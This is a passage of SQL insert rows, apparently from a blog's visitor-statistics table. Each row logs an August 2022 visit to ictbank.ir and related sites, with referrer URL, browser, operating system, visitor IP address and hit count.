(23090,'2022-08-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(23091,'2022-08-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,3,0),
(23092,'2022-08-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','38.75.137.54','000',0,2,0),
(23093,'2022-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','147.182.192.59','000',0,2,0),
(23094,'2022-08-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.106','000',0,2,0),
(23095,'2022-08-03','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,3,0),
(23096,'2022-08-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(23097,'2022-08-03','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,3,0),
(23098,'2022-08-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(23099,'2022-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.90.141.120','000',0,1,0),
(23100,'2022-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','137.184.86.169','000',0,2,0),
(23101,'2022-08-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(23102,'2022-08-03','https://www.bing.com','Chrome','Windows','6.1',NULL,NULL,'','206.189.194.108','000',0,1,0),
(23103,'2022-08-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.63','000',0,2,0),
(23104,'2022-08-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(23105,'2022-08-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(23106,'2022-08-03','http://ictbank.ir/blog','Safari','iOS','13.2.3',NULL,NULL,'','120.41.45.199','000',0,3,0),
(23107,'2022-08-04','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.66','000',0,2,0),
(23108,'2022-08-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','144.91.106.14','000',0,1,0),
(23109,'2022-08-04','http://ictbank.ir/blog','Chrome','OS X','10.6.7',NULL,NULL,'','208.80.194.122','000',0,5,0),
(23110,'2022-08-04','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.55.120','000',0,1,0),
(23111,'2022-08-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.46','000',0,1,0),
(23112,'2022-08-04','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.123','000',0,1,0),
(23113,'2022-08-04','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.126','000',0,3,0),
(23114,'2022-08-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(23115,'2022-08-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(23116,'2022-08-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.76','000',0,2,0),
(23117,'2022-08-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.56.169.117','000',0,2,0),
(23118,'2022-08-04','http://www.ictbank.ir/blog','Chrome','OS X','10.11.3',NULL,NULL,'','143.198.26.16','000',0,4,0),
(23119,'2022-08-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.198','000',0,2,0),
(23120,'2022-08-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,5,0),
(23121,'2022-08-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.90.10.44','000',0,1,0),
(23122,'2022-08-04','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','134.209.43.12','000',0,2,0),
(23123,'2022-08-04','http://www.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.13','000',0,2,0),
(23124,'2022-08-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.0.229','000',0,1,0),
(23125,'2022-08-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,2,0),
(23126,'2022-08-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(23127,'2022-08-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.232.87.58','000',0,4,0),
(23128,'2022-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,1,0),
(23129,'2022-08-05','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,7,0),
(23130,'2022-08-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.129','000',0,1,0),
(23131,'2022-08-05','http://82.102.9.14/blog/','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.179','000',0,1,0),
(23132,'2022-08-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(23133,'2022-08-05','http://www.design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.103.149','000',0,1,0),
(23134,'2022-08-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.173.120','000',0,1,0),
(23135,'2022-08-05','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.152.94','000',0,1,0),
(23136,'2022-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','139.59.101.204','000',0,2,0),
(23137,'2022-08-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','209.141.57.178','000',0,1,0),
(23138,'2022-08-05','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','143.198.188.133','000',0,5,0),
(23139,'2022-08-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.226.97','000',0,2,0),
(23140,'2022-08-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,4,0),
(23141,'2022-08-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','38.75.137.54','000',0,2,0),
(23142,'2022-08-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(23143,'2022-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.100.195','000',0,1,0),
(23144,'2022-08-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.71.233.51','000',0,2,0),
(23145,'2022-08-05','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.235.24.134','000',0,2,0),
(23146,'2022-08-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,2,0),
(23147,'2022-08-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(23148,'2022-08-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(23149,'2022-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.199.79.162','000',0,1,0),
(23150,'2022-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(23151,'2022-08-05','http://ictbank.ir/blog','Android Browser','Android','9',NULL,NULL,'','8.142.168.136','000',0,3,0),
(23152,'2022-08-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(23153,'2022-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.103','000',0,11,0),
(23154,'2022-08-06','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(23155,'2022-08-06','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,4,0),
(23156,'2022-08-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(23157,'2022-08-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','35.165.215.140','000',0,2,0),
(23158,'2022-08-06','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','205.210.31.141','000',0,2,0),
(23159,'2022-08-06','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','158.69.23.79','000',0,1,0),
(23160,'2022-08-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.57','000',0,2,0),
(23161,'2022-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.67','000',0,6,0),
(23162,'2022-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.72','000',0,2,0),
(23163,'2022-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.75','000',0,2,0),
(23164,'2022-08-06','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','205.210.31.21','000',0,2,0),
(23165,'2022-08-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(23166,'2022-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.43.165.140','000',0,1,0),
(23167,'2022-08-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,1,0),
(23168,'2022-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,1,0),
(23169,'2022-08-06','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.121','000',0,3,0),
(23170,'2022-08-06','http://www.design-arena.ir/','Chrome','Windows','6.1',NULL,NULL,'','82.192.95.118','000',0,2,0),
(23171,'2022-08-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,2,0),
(23172,'2022-08-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(23173,'2022-08-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(23174,'2022-08-06','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','205.210.31.35','000',0,2,0),
(23175,'2022-08-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(23176,'2022-08-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(23177,'2022-08-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.103','000',0,12,0),
(23178,'2022-08-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(23179,'2022-08-07','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,6,0),
(23180,'2022-08-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,2,0),
(23181,'2022-08-07','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.51.222','000',0,1,0),
(23182,'2022-08-07','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.49.169','000',0,1,0),
(23183,'2022-08-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.225.15','000',0,2,0),
(23184,'2022-08-07','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.55.120','000',0,1,0),
(23185,'2022-08-07','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.41.193','000',0,1,0),
(23186,'2022-08-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','38.75.137.54','000',0,2,0),
(23187,'2022-08-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','34.168.220.228','000',0,1,0),
(23188,'2022-08-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.21.168','000',0,1,0),
(23189,'2022-08-07','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','54.174.25.20','000',0,2,0),
(23190,'2022-08-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(23191,'2022-08-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.220.182','000',0,1,0),
(23192,'2022-08-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(23193,'2022-08-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(23194,'2022-08-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(23195,'2022-08-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(23196,'2022-08-08','http://ictbank.ir/blog','Safari','OS X','10.7.2',NULL,NULL,'','208.80.194.126','000',0,4,0),
(23197,'2022-08-08','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','205.210.31.147','000',0,2,0),
(23198,'2022-08-08','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,3,0),
(23199,'2022-08-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,2,0),
(23200,'2022-08-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(23201,'2022-08-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','213.164.204.146','000',0,1,0),
(23202,'2022-08-08','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','205.210.31.28','000',0,2,0),
(23203,'2022-08-08','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.235.24.6','000',0,1,0),
(23204,'2022-08-08','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.239.162.122','000',0,1,0),
(23205,'2022-08-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.18','000',0,2,0),
(23206,'2022-08-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','38.75.137.54','000',0,2,0),
(23207,'2022-08-08','http://ictbank.ir/blog','Chrome','OS X','10.11',NULL,NULL,'','61.147.15.67','000',0,4,0),
(23208,'2022-08-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.124.204','000',0,1,0),
(23209,'2022-08-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(23210,'2022-08-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.222.35','000',0,1,0),
(23211,'2022-08-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(23212,'2022-08-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(23213,'2022-08-08','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.36.112','000',0,1,0),
(23214,'2022-08-08','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.116.89','000',0,1,0),
(23215,'2022-08-08','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.47','000',0,1,0),
(23216,'2022-08-08','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.41.193','000',0,1,0),
(23217,'2022-08-08','http://ictbank.ir','Chrome','Windows','5.1',NULL,NULL,'','188.68.41.191','000',0,1,0),
(23218,'2022-08-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','143.244.140.185','000',0,2,0),
(23219,'2022-08-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(23220,'2022-08-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.223.91.189','000',0,2,0),
(23221,'2022-08-09','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,5,0),
(23222,'2022-08-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(23223,'2022-08-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(23224,'2022-08-09','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','181.214.173.89','000',0,15,0),
(23225,'2022-08-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,6,0),
(23226,'2022-08-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,3,0),
(23227,'2022-08-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,3,0),
(23228,'2022-08-09','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','89.136.38.194','000',0,9,0),
(23229,'2022-08-09','http://ictbank.ir','Firefox','Windows','10.0',NULL,NULL,'','198.244.220.113','000',0,2,0),
(23230,'2022-08-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(23231,'2022-08-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','208.100.26.232','000',0,2,0),
(23232,'2022-08-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.25.151.60','000',0,1,0),
(23233,'2022-08-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(23234,'2022-08-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.188.62.21','000',0,1,0),
(23235,'2022-08-09','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','205.210.31.10','000',0,2,0),
(23236,'2022-08-09','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','205.210.31.28','000',0,2,0),
(23237,'2022-08-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.165.120','000',0,1,0),
(23238,'2022-08-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.12','000',0,2,0),
(23239,'2022-08-09','http://ictbank.ir/blog','Chrome','OS X','10.11',NULL,NULL,'','61.147.15.67','000',0,4,0),
(23240,'2022-08-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(23241,'2022-08-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.63','000',0,1,0),
(23242,'2022-08-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.115.86','000',0,1,0),
(23243,'2022-08-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(23244,'2022-08-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(23245,'2022-08-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','189.51.96.252','000',0,4,0),
(23246,'2022-08-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.65.148.217','000',0,2,0),
(23247,'2022-08-09','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.170','000',0,1,0),
(23248,'2022-08-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.50','000',0,3,0),
(23249,'2022-08-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.57','000',0,1,0),
(23250,'2022-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.57','000',0,6,0),
(23251,'2022-08-10','http://ictbank.ir/blog','Firefox','Windows','6.0',NULL,NULL,'','208.80.194.122','000',0,8,0),
(23252,'2022-08-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,4,0),
(23253,'2022-08-10','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','103.14.35.145','000',0,1,0),
(23254,'2022-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.34','000',0,15,0),
(23255,'2022-08-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(23256,'2022-08-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.136','000',0,2,0),
(23257,'2022-08-10','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','89.136.38.194','000',0,9,0),
(23258,'2022-08-10','http://ictbank.ir/blog','Yandex Browser','OS X','Unknown',NULL,NULL,'','46.161.11.73','000',0,1,0),
(23259,'2022-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.21','000',0,2,0),
(23260,'2022-08-10','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.15','000',0,2,0),
(23261,'2022-08-10','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.66','000',0,1,0),
(23262,'2022-08-10','http://wikisonnati.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.69','000',0,1,0),
(23263,'2022-08-10','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','208.80.194.121','000',0,1,0),
(23264,'2022-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.27','000',0,2,0),
(23265,'2022-08-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.90.172.119','000',0,1,0),
(23266,'2022-08-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.225.16','000',0,2,0),
(23267,'2022-08-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(23268,'2022-08-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(23269,'2022-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(23270,'2022-08-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(23271,'2022-08-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(23272,'2022-08-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(23273,'2022-08-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(23274,'2022-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.54','000',0,16,0),
(23275,'2022-08-10','http://ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','14.225.3.59','000',0,2,0),
(23276,'2022-08-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.188.62.76','000',0,2,0),
(23277,'2022-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.44','000',0,2,0),
(23278,'2022-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.28','000',0,5,0),
(23279,'2022-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.43','000',0,2,0),
(23280,'2022-08-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(23281,'2022-08-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.43','000',0,5,0),
(23282,'2022-08-11','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(23283,'2022-08-11','http://wikisonnati.com/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.208','000',0,2,0),
(23284,'2022-08-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.31','000',0,14,0),
(23285,'2022-08-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(23286,'2022-08-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.58','000',0,15,0),
(23287,'2022-08-11','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.121','000',0,3,0),
(23288,'2022-08-11','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','158.69.23.79','000',0,1,0),
(23289,'2022-08-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.129.64.144','000',0,1,0),
(23290,'2022-08-11','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','185.23.182.110','000',0,3,0),
(23291,'2022-08-11','https://www.bing.com','Chrome','Windows','6.1',NULL,NULL,'','202.29.32.169','000',0,1,0),
(23292,'2022-08-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,4,0),
(23293,'2022-08-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.227','000',0,1,0),
(23294,'2022-08-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(23295,'2022-08-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','35.165.215.140','000',0,1,0),
(23296,'2022-08-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.135.131','000',0,2,0),
(23297,'2022-08-11','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','167.71.191.126','000',0,2,0),
(23298,'2022-08-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.90.46.100','000',0,1,0),
(23299,'2022-08-11','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.122.184','000',0,1,0),
(23300,'2022-08-11','http://www.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.136.78','000',0,2,0),
(23301,'2022-08-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.26','000',0,2,0),
(23302,'2022-08-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(23303,'2022-08-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(23304,'2022-08-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(23305,'2022-08-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(23306,'2022-08-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(23307,'2022-08-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.37','000',0,3,0),
(23308,'2022-08-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.117','000',0,6,0),
(23309,'2022-08-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.54','000',0,12,0),
(23310,'2022-08-11','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','77.122.200.86','000',0,2,0),
(23311,'2022-08-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(23312,'2022-08-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.38','000',0,10,0),
(23313,'2022-08-12','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,3,0),
(23314,'2022-08-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.117','000',0,5,0),
(23315,'2022-08-12','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','35.194.93.63','000',0,1,0),
(23316,'2022-08-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.55','000',0,29,0),
